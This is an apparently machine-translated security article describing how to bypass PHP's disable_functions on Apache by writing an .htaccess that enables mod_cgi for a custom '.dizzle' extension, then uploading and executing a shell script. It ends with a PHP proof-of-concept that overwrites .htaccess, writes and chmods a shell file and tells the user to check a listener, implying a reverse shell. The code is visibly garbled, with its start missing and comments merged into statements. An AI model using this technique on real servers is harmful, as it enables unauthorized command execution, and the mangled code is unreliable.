Disable PHP's system function for shell access

You can disable PHP functions

If you have a Web server running PHP, disabling some of the dangerous features of PHP may be a good idea, and some of these features may not be needed by your site. If an attacker manages to run malicious code on your server, limiting the functionality provided by some function may reduce the harm caused by the attack. Fortunately, PHP provides us with an easy way to do this. You just have to do the disable_functions function for the function you want to disable. However, in some cases, the execution of the system commands is still possible, and I will use an mod_cgi-enabled. htaccess file as an example to explain to you.

This method applies only to a subset of Apache server configurations, and I'm sure I'm not the first person to find this problem. Anyway, here are 3 minimum requirements to meet:

Need to enable mod_cgi;

Need to allow htaccess files;

You must be able to write to the file.

Background knowledge:

What is mod_cgi?

Where CGI represents the common Gateway interface. It allows the Web server to interact with the executable file. This means that you can use C,perl or Python to write Web applications. It is possible even if all of the shell scripts make up a Web application. You can also run PHP as a CGI program, rather than as a module.

What is a htaccess file?

Apache supports so-called virtual hosts. A virtual host is typically used to run multiple Web sites or subdomains on a single machine. In these internal files, you can change the Web root of the Web site or the various settings in the specific options of the Apache module as you like. Sometimes in a shared hosting environment, users are allowed to customize their own sites to their liking, but they do not have the ability to change other user settings on the same host. This is where the htaccess file comes in handy. It is the foundation that allows you to change many of the virtual host settings under each directory. It is common to use htaccess to do this directly in the virtual Hosts file, as long as you have the opportunity to get them.

How do we use it?

With this knowledge, how can we use them to get the system shell access, even if it is disabled in PHP? First we have to check whether all the above requirements have been met. As I said above, there are times when it's not true. However, if we are lucky enough, we can try everything written or enabled to achieve the goal. We try to achieve the following objectives:

We want to be able to execute CGI scripts in the current directory. This needs to be done using the options +execcgi in a htaccess file. The mod_cgi must be able to distinguish between actual CGI scripts and other files. To do this, we need to specify some extensions that it can recognize. Can be any extension you want, such as. Dizzle. We use AddHandler cgi-script. Dizzle in the. htaccess file to do this. Now we can upload a shell script ending with a. dizzle suffix and make it executable using PHP's chmod command (' Shell.dizzle ', 0777). When our script has output, first we have to set a header with the same type of content, otherwise Apache will display the StatusCode 500 error. We did this just to put Echo-ne "content-type:text/html\ n \ n" as the first output in our shell script. After that, you can do almost anything you can do with a normal shell script.

Just looking at these theories is boring, here is an example of a POC attack:

 \ n ";} if (!isset ($_get[' checked ')) {@file_put_contents ('. htaccess ', "\nsetenv htaccess on", file_append);//append it to a. htaccess file to see whether. htaccess are Allowedheader (' location: '. $_server[' php_self '). '? Checked=true ');  Execute the script again to see if the htaccess test worked}else{$modcgi = In_array (' mod_cgi ', Apache_get_modules ()); mod_cgi enabled $writable = is_writable ('. '); Current dir writable? $htaccess =!empty ($_server[' htaccess '); Htaccess enabled?checkenabled ("mod-cgi enabled", $modcgi, "yes", "No") checkenabled ("is writable", $writable, "yes", "No"); Checkenabled ("htaccess working", $htaccess, "Yes", "no"); $modcgi && $writable && $htaccess)) {echo "Error. All of the above must is true for the script to work! "; Abort if not}else{checkenabled ("Backing up. htaccess", copy (". htaccess", ". Htaccess.bak"), "suceeded! Saved in. Htaccess.bak "," failed! "); Make a backup, cause you never know.checkenabled ("Write. htaccess file", File_put_contents ('. hTaccess ', "Options +execcgi\naddhandler cgi-script. Dizzle"), "succeeded!", "failed!"); . Dizzle is a nice extensioncheckenabled ("Write Shell file", file_put_contents (' Shell.dizzle ', $shellfile), "succeeded ! "," failed! "); Write the filecheckenabled ("Chmod 777", Chmod ("Shell.dizzle", 0777), "succeeded!", "failed!"); Rwxecho "Executing the script now. Check your listener "; Call the Script}}?>

This article by 360 security broadcast translation, reprint please specify "Transfer from 360 security broadcast", and attached link.

Original link: https://blog.asdizzle.com/index.php/2016/05/02/getting-shell-access-with-php-system-functions-disabled/

